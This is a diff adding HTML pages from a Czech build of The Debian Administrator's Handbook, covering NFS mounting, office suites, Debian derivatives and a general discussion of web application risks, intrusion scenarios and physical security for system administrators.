+              class="literal">nobody</code> and group <code
+              class="literal">nogroup</code>).
+			</div><div
+            class="para">
+				With NFSv4, you can add a <code
+              class="literal">sec</code> option to indicate the security level that you want: <code
+              class="literal">sec=sys</code> is the default with no special security features, <code
+              class="literal">sec=krb5</code> enables authentication only, <code
+              class="literal">sec=krb5i</code> adds integrity protection, and <code
+              class="literal">sec=krb5p</code> is the most complete level which includes privacy protection (with data encryption). For this to work you need a working Kerberos setup (that service is not covered by this book).
+			</div><div
+            class="para">
+				Other options are available; they are documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">exports</span>(5)</span> manual page.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> First installation</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="filename">/etc/init.d/nfs-kernel-server</code> boot script only starts the server if the <code
+                class="filename">/etc/exports</code> lists one or more valid NFS shares. On initial configuration, once this file has been edited to contain valid entries, the NFS server must therefore be started with the following command:
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>service nfs-kernel-server start</code></strong></pre></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.7.12"></a>11.4.3. NFS Client</h3></div></div></div><a
+            id="id-1.14.7.12.2"
+            class="indexterm"></a><a
+            id="id-1.14.7.12.3"
+            class="indexterm"></a><div
+            class="para">
+				As with other filesystems, integrating an NFS share into the system hierarchy requires mounting. Since this filesystem has its peculiarities, a few adjustments were required in the syntaxes of the <code
+              class="command">mount</code> command and the <code
+              class="filename">/etc/fstab</code> file.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.7.12.5"></a><p
+              class="title"><strong>Příklad 11.22. Manually mounting with the <code
+                  class="command">mount</code> command</strong></p><div
+              class="example-contents"><pre
+                class="screen">
+          <code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mount -t nfs4 -o rw,nosuid arrakis.internal.falcot.com:/shared /srv/shared</code></strong></pre></div></div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.7.12.6"></a><p
+              class="title"><strong>Příklad 11.23. NFS entry in the <code
+                  class="filename">/etc/fstab</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+arrakis.internal.falcot.com:/shared /srv/shared nfs4 rw,nosuid 0 0
+</pre></div></div><div
+            class="para">
+				The entry described above mounts, at system startup, the <code
+              class="filename">/shared/</code> NFS directory from the <code
+              class="literal">arrakis</code> server into the local <code
+              class="filename">/srv/shared/</code> directory. Read-write access is requested (hence the <code
+              class="literal">rw</code> parameter). The <code
+              class="literal">nosuid</code> option is a protection measure that wipes any <code
+              class="literal">setuid</code> or <code
+              class="literal">setgid</code> bit from programs stored on the share. If the NFS share is only meant to store documents, another recommended option is <code
+              class="literal">noexec</code>, which prevents executing programs stored on the share. Note that on the server, the <code
+              class="filename">shared</code> directory is below the NFSv4 root export (for example <code
+              class="filename">/export/shared</code>), it is not a top-level directory.
+			</div><div
+            class="para">
+				The <span
+              class="citerefentry"><span
+                class="refentrytitle">nfs</span>(5)</span> manual page describes all the options in some detail.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ftp-file-server.html"><strong>Předcházející</strong>11.3. FTP File Server</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.windows-file-server-with-samba.html"><strong>Další</strong>11.5. Setting Up Windows Shares with Samba</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.office-suites.html b/tmp/cs-CZ/html/sect.office-suites.html
new file mode 100644
index 000000000..bd096a0b9
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.office-suites.html
@@ -0,0 +1,135 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.8. Office Suites</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.collaborative-work.html"
+        title="13.7. Collaborative Work" /><link
+        rel="next"
+        href="sect.windows-emulation.html"
+        title="13.9. Emulating Windows: Wine" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.office-suites.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.collaborative-work.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.windows-emulation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.office-suites"></a>13.8. Office Suites</h2></div></div></div><a
+          id="id-1.16.11.2"
+          class="indexterm"></a><a
+          id="id-1.16.11.3"
+          class="indexterm"></a><div
+          class="para">
+			Office software has long been seen as lacking in the free software world. Users require replacements for Microsoft tools such as Word and Excel, but these are so complex that replacements were hard to develop. The situation changed when Sun released the StarOffice code under a free license as OpenOffice, a project which later gave birth to Libre Office, which is available on Debian. The KDE project also has its own office suite, called Calligra Suite (previously KOffice), and GNOME, while never offering a comprehensive office suite, provides AbiWord as a word processor and Gnumeric as a spreadsheet. The various projects each have their strengths. For instance, the Gnumeric spreadsheet is better than OpenOffice.org/Libre Office in some domains, notably the precision of its calculations. On the word processing front, the Libre Office suite still leads the way.
+		</div><a
+          id="id-1.16.11.5"
+          class="indexterm"></a><a
+          id="id-1.16.11.6"
+          class="indexterm"></a><a
+          id="id-1.16.11.7"
+          class="indexterm"></a><a
+          id="id-1.16.11.8"
+          class="indexterm"></a><a
+          id="id-1.16.11.9"
+          class="indexterm"></a><a
+          id="id-1.16.11.10"
+          class="indexterm"></a><div
+          class="para">
+			Another important feature for users is the ability to import Microsoft Office documents. Even though all office suites have this feature, only the ones in OpenOffice.org and Libre Office are functional enough for daily use.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>THE BROADER VIEW</em></span> Libre Office replaces OpenOffice.org</strong></p></div></div></div><div
+            class="para">
+			OpenOffice.org contributors set up a foundation (<span
+              class="emphasis"><em>The Document Foundation</em></span>) to foster the project's development. The idea had been discussed for some time, but the actual trigger was Oracle's acquisition of Sun. The new ownership made the future of OpenOffice under Oracle uncertain. Since Oracle declined to join the foundation, the developers had to give up on the OpenOffice.org name. This office suite is now known as <span
+              class="emphasis"><em>Libre Office</em></span>, and is available in Debian.
+		</div><div
+            class="para">
+			After a period of relative stagnation on OpenOffice.org, Oracle donated the code and associated rights to the Apache Software Foundation, and OpenOffice is now an Apache project. This project is not currently available in Debian and is rather moribund when compared to Libre Office.
+		</div></div><a
+          id="id-1.16.11.13"
+          class="indexterm"></a><a
+          id="id-1.16.11.14"
+          class="indexterm"></a><a
+          id="id-1.16.11.15"
+          class="indexterm"></a><a
+          id="id-1.16.11.16"
+          class="indexterm"></a><div
+          class="para">
+			Libre Office and Calligra Suite are available in the <span
+            class="pkg pkg">libreoffice</span> and <span
+            class="pkg pkg">calligra</span> Debian packages, respectively. Although the <span
+            class="pkg pkg">gnome-office</span> package was previously used to install a collection of office tools such as AbiWord and Gnumeric, this package is no longer part of Debian, with the individual packages now standing on their own.
+		</div><div
+          class="para">
+			Language-specific packs for Libre Office are distributed in separate packages, most notably <span
+            class="pkg pkg">libreoffice-l10n-*</span> and <span
+            class="pkg pkg">libreoffice-help-*</span>. Some features such as spelling dictionaries, hyphenation patterns and thesauri are in separate packages, such as <span
+            class="pkg pkg">myspell-*</span>, <span
+            class="pkg pkg">hunspell-*</span>, <span
+            class="pkg pkg">hyphen-*</span> and <span
+            class="pkg pkg">mythes-*</span>.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.collaborative-work.html"><strong>Předcházející</strong>13.7. Collaborative Work</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.windows-emulation.html"><strong>Další</strong>13.9. Emulating Windows: Wine</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.other-derivatives.html b/tmp/cs-CZ/html/sect.other-derivatives.html
new file mode 100644
index 000000000..68aeac8e6
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.other-derivatives.html
@@ -0,0 +1,94 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.13. And Many More</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.raspbian.html"
+        title="A.12. Raspbian" /><link
+        rel="next"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.other-derivatives.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.raspbian.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="short-remedial-course.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.other-derivatives"></a>A.13. And Many More</h2></div></div></div><a
+          id="id-1.20.16.2"
+          class="indexterm"></a><div
+          class="para">
+			The Distrowatch website references a huge number of Linux distributions, many of which are based on Debian. Browsing this site is a great way to get a sense of the diversity in the Free Software world. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://distrowatch.com">http://distrowatch.com</a></div>
+		</div><div
+          class="para">
+			The search form can help track down a distribution based on its ancestry. In March 2015, selecting Debian led to 131 active distributions! <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://distrowatch.com/search.php">http://distrowatch.com/search.php</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.raspbian.html"><strong>Předcházející</strong>A.12. Raspbian</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="short-remedial-course.html"><strong>Další</strong>Příloha B. Short Remedial Course</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.other-security-considerations.html b/tmp/cs-CZ/html/sect.other-security-considerations.html
new file mode 100644
index 000000000..c2fd9816c
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.other-security-considerations.html
@@ -0,0 +1,254 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.6. Other Security-Related Considerations</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.selinux.html"
+        title="14.5. Introduction to SELinux" /><link
+        rel="next"
+        href="sect.dealing-with-compromised-machine.html"
+        title="14.7. Dealing with a Compromised Machine" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.other-security-considerations.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.selinux.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dealing-with-compromised-machine.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.other-security-considerations"></a>14.6. Other Security-Related Considerations</h2></div></div></div><div
+          class="para">
+			Security is not just a technical problem; more than anything, it is about good practices and understanding the risks. This section reviews some of the more common risks, as well as a few best practices which should, depending on the case, increase security or lessen the impact of a successful attack.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.9.3"></a>14.6.1. Inherent Risks of Web Applications</h3></div></div></div><div
+            class="para">
+				The universal character of web applications led to their proliferation. Several are often run in parallel: a webmail, a wiki, some groupware system, forums, a photo gallery, a blog, and so on. Many of those applications rely on the “LAMP” (<span
+              class="emphasis"><em>Linux, Apache, MySQL, PHP</em></span>) stack. Unfortunately, many of those applications were also written without much consideration for security problems. Data coming from outside is, too often, used with little or no validation. Providing specially-crafted values can be used to subvert a call to a command so that another one is executed instead. Many of the most obvious problems have been fixed as time has passed, but new security problems pop up regularly.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> SQL injection</strong></p></div></div></div><div
+              class="para">
+				When a program inserts data into SQL queries in an insecure manner, it becomes vulnerable to SQL injections; this name covers the act of changing a parameter in such a way that the actual query executed by the program is different from the intended one, either to damage the database or to access data that should normally not be accessible. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://en.wikipedia.org/wiki/SQL_Injection">http://en.wikipedia.org/wiki/SQL_Injection</a></div>
+			</div><a
+              id="id-1.17.9.3.3.3"
+              class="indexterm"></a></div><div
+            class="para">
+				Updating web applications regularly is therefore a must, lest any cracker (whether a professional attacker or a script kiddy) can exploit a known vulnerability. The actual risk depends on the case, and ranges from data destruction to arbitrary code execution, including web site defacement.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.9.4"></a>14.6.2. Knowing What To Expect</h3></div></div></div><div
+            class="para">
+				A vulnerability in a web application is often used as a starting point for cracking attempts. What follows is a short review of possible consequences.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> Filtering HTTP queries</strong></p></div></div></div><div
+              class="para">
+				Apache 2 includes modules allowing filtering incoming HTTP queries. This allows blocking some attack vectors. For instance, limiting the length of parameters can prevent buffer overflows. More generally, one can validate parameters before they are even passed to the web application and restrict access along many criteria. This can even be combined with dynamic firewall updates, so that a client infringing one of the rules is banned from accessing the web server for a given period of time.
+			</div><div
+              class="para">
+				Setting up these checks can be a long and cumbersome task, but it can pay off when the web application to be deployed has a dubious track record where security is concerned.
+			</div><div
+              class="para">
+				<span
+                class="emphasis"><em>mod-security2</em></span> (in the <span
+                class="pkg pkg">libapache2-mod-security2</span> package) is the main such module. It even comes with many ready-to-use rules of its own (in the <span
+                class="pkg pkg">modsecurity-crs</span> package) that you can easily enable.
+			</div><a
+              id="id-1.17.9.4.3.5"
+              class="indexterm"></a><a
+              id="id-1.17.9.4.3.6"
+              class="indexterm"></a></div><div
+            class="para">
+				The consequences of an intrusion will have various levels of obviousness depending on the motivations of the attacker. <span
+              class="emphasis"><em>Script-kiddies</em></span> only apply recipes they find on web sites; most often, they deface a web page or delete data. In more subtle cases, they add invisible contents to web pages so as to improve referrals to their own sites in search engines.
+			</div><div
+            class="para">
+				A more advanced attacker will go beyond that. A disaster scenario could go on in the following fashion: the attacker gains the ability to execute commands as the <code
+              class="literal">www-data</code> user, but executing a command requires many manipulations. To make their life easier, they install other web applications specially designed to remotely execute many kinds of commands, such as browsing the filesystem, examining permissions, uploading or downloading files, executing commands, and even provide a network shell. Often, the vulnerability will allow running a <code
+              class="command">wget</code> command that will download some malware into <code
+              class="filename">/tmp/</code>, then executing it. The malware is often downloaded from a foreign website that was previously compromised, in order to cover tracks and make it harder to find out the actual origin of the attack.
+			</div><div
+            class="para">
+				At this point, the attacker has enough freedom of movement that they often install an IRC <span
+              class="emphasis"><em>bot</em></span> (a robot that connects to an IRC server and can be controlled by this channel). This bot is often used to share illegal files (unauthorized copies of movies or software, and so on). A determined attacker may want to go even further. The <code
+              class="literal">www-data</code> account does not allow full access to the machine, and the attacker will try to obtain administrator privileges. Now, this should not be possible, but if the web application was not up-to-date, chances are that the kernel and other programs are outdated too; this sometimes follows a decision from the administrator who, despite knowing about the vulnerability, neglected to upgrade the system since there are no local users. The attacker can then take advantage of this second vulnerability to get root access.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Privilege escalation</strong></p></div></div></div><div
+              class="para">
+				This term covers anything that can be used to obtain more permissions than a given user should normally have. The <code
+                class="command">sudo</code> program is designed for precisely the purpose of giving administrative rights to some users. But the same term is also used to describe the act of an attacker exploiting a vulnerability to obtain undue rights.
+			</div></div><div
+            class="para">
+				Now the attacker owns the machine; they will usually try to keep this privileged access for as long as possible. This involves installing a <span
+              class="emphasis"><em>rootkit</em></span>, a program that will replace some components of the system so that the attacker will be able to obtain the administrator privileges again at a later time; the rootkit also tries hiding its own existence as well as any traces of the intrusion. A subverted <code
+              class="command">ps</code> program will omit to list some processes, <code
+              class="command">netstat</code> will not list some of the active connections, and so on. Using the root permissions, the attacker was able to observe the whole system, but didn't find important data; so they will try accessing other machines in the corporate network. Analyzing the administrator's account and the history files, the attacker finds what machines are routinely accessed. By replacing <code
+              class="command">sudo</code> or <code
+              class="command">ssh</code> with a subverted program, the attacker can intercept some of the administrator's passwords, which they will use on the detected servers… and the intrusion can propagate from then on.
+			</div><div
+            class="para">
+				This is a nightmare scenario which can be prevented by several measures. The next few sections describe some of these measures.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.choosing-the-software-wisely"></a>14.6.3. Choosing the Software Wisely</h3></div></div></div><div
+            class="para">
+				Once the potential security problems are known, they must be taken into account at each step of the process of deploying a service, especially when choosing the software to install. Many web sites, such as <code
+              class="literal">SecurityFocus.com</code>, keep a list of recently-discovered vulnerabilities, which can give an idea of a security track record before some particular software is deployed. Of course, this information must be balanced against the popularity of said software: a more widely-used program is a more tempting target, and it will be more closely scrutinized as a consequence. On the other hand, a niche program may be full of security holes that never get publicized due to a lack of interest in a security audit.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Security audit</strong></p></div></div></div><div
+              class="para">
+				A security audit is the process of thoroughly reading and analyzing the source code of some software, looking for potential security vulnerabilities it could contain. Such audits are usually proactive and they are conducted to ensure a program meets certain security requirements.
+			</div></div><div
+            class="para">
+				In the Free Software world, there is generally ample room for choice, and choosing one piece of software over another should be a decision based on the criteria that apply locally. More features imply an increased risk of a vulnerability hiding in the code; picking the most advanced program for a task may actually be counter-productive, and a better approach is usually to pick the simplest program that meets the requirements.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Zero-day exploit</strong></p></div></div></div><div
+              class="para">
+				A <span
+                class="emphasis"><em>zero-day exploit</em></span> attack is hard to prevent; the term covers a vulnerability that is not yet known to the authors of the program.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.managing-a-machine-as-a-whole"></a>14.6.4. Managing a Machine as a Whole</h3></div></div></div><div
+            class="para">
+				Most Linux distributions install by default a number of Unix services and many tools. In many cases, these services and tools are not required for the actual purposes for which the administrator set up the machine. As a general guideline in security matters, unneeded software is best uninstalled. Indeed, there is no point in securing an FTP server, if a vulnerability in a different, unused service can be used to get administrator privileges on the whole machine.
+			</div><div
+            class="para">
+				By the same reasoning, firewalls will often be configured to only allow access to services that are meant to be publicly accessible.
+			</div><div
+            class="para">
+				Current computers are powerful enough to allow hosting several services on the same physical machine. From an economic viewpoint, such a possibility is interesting: only one computer to administrate, lower energy consumption, and so on. From the security point of view, however, such a choice can be a problem. One compromised service can bring access to the whole machine, which in turn compromises the other services hosted on the same computer. This risk can be mitigated by isolating the services. This can be attained either with virtualization (each service being hosted in a dedicated virtual machine or container), or with AppArmor/SELinux (each service daemon having an adequately designed set of permissions).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.users-are-players"></a>14.6.5. Users Are Players</h3></div></div></div><div
+            class="para">
+				Discussing security immediately brings to mind protection against attacks by anonymous crackers hiding in the Internet jungle; but an often-forgotten fact is that risks also come from inside: an employee about to leave the company could download sensitive files on the important projects and sell them to competitors, a negligent salesman could leave their desk without locking their session during a meeting with a new prospect, a clumsy user could delete the wrong directory by mistake, and so on.
+			</div><div
+            class="para">
+				The response to these risks can involve technical solutions: no more than the required permissions should be granted to users, and regular backups are a must. But in many cases, the appropriate protection is going to involve training users to avoid the risks.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> <span
+                        class="pkg pkg">autolog</span></strong></p></div></div></div><div
+              class="para">
+				The <span
+                class="pkg pkg">autolog</span> package provides a program that automatically disconnects inactive users after a configurable delay. It also allows killing user processes that persist after a session ends, thereby preventing users from running daemons.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.physical-security"></a>14.6.6. Physical Security</h3></div></div></div><div
+            class="para">
+				There is no point in securing the services and networks if the computers themselves are not protected. Important data deserve being stored on hot-swappable hard disks in RAID arrays, because hard disks fail eventually and data availability is a must. But if any pizza delivery boy can enter the building, sneak into the server room and run away with a few selected hard disks, an important part of security is not fulfilled. Who can enter the server room? Is access monitored? These questions deserve consideration (and an answer) when physical security is being evaluated.
+			</div><div
+            class="para">
+				Physical security also includes taking into consideration the risks for accidents such as fires. This particular risk is what justifies storing the backup media in a separate building, or at least in a fire-proof strongbox.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.9.9"></a>14.6.7. Legal Liability</h3></div></div></div><div
+            class="para">
+				An administrator is, more or less implicitly, trusted by their users as well as the users of the network in general. They should therefore avoid any negligence that malevolent people could exploit.
+			</div><div
+            class="para">
+				An attacker taking control of your machine then using it as a forward base (known as a “relay system”) from which to perform other nefarious activities could cause legal trouble for you, since the attacked party would initially see the attack coming from your system, and therefore consider you as the attacker (or as an accomplice). In many cases, the attacker will use your server as a relay to send spam, which shouldn't have much impact (except potentially registration on black lists that could restrict your ability to send legitimate emails), but won't be pleasant nevertheless. In other cases, more important trouble can be caused from your machine, for instance denial of service attacks. This will sometimes induce loss of revenue, since the legitimate services will be unavailable and data can be destroyed; sometimes this will also imply a real cost, because the attacked party can start legal proceedings against you. Rights-holders can sue you if an unauthorized copy of a work protected by copyright law is shared from your server, as well as other companies compelled by service level agreements if they are bound to pay penalties following the attack from your machine.
+			</div><div
+            class="para">
+				When these situations occur, claiming innocence is not usually enough; at the very least, you will need convincing evidence showing suspect activity on your system coming from a given IP address. This won't be possible if you neglect the recommendations of this chapter and let the attacker obtain access to a privileged account (root, in particular) and use it to cover their tracks.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.selinux.html"><strong>Předcházející</strong>14.5. Introduction to SELinux</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dealing-with-compromised-machine.html"><strong>Další</strong>14.7. Dealing with a Compromised Machine</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.package-authentication.html b/tmp/cs-CZ/html/sect.package-authentication.html
new file mode 100644
index 000000000..292cc514a
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.package-authentication.html
@@ -0,0 +1,197 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.5. Checking Package Authenticity</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.apt-frontends.html"
+        title="6.4. Frontends: aptitude, synaptic" /><link
+        rel="next"
+        href="sect.dist-upgrade.html"
+        title="6.6. Upgrading from One Stable Distribution to the Next" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.package-authentication.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
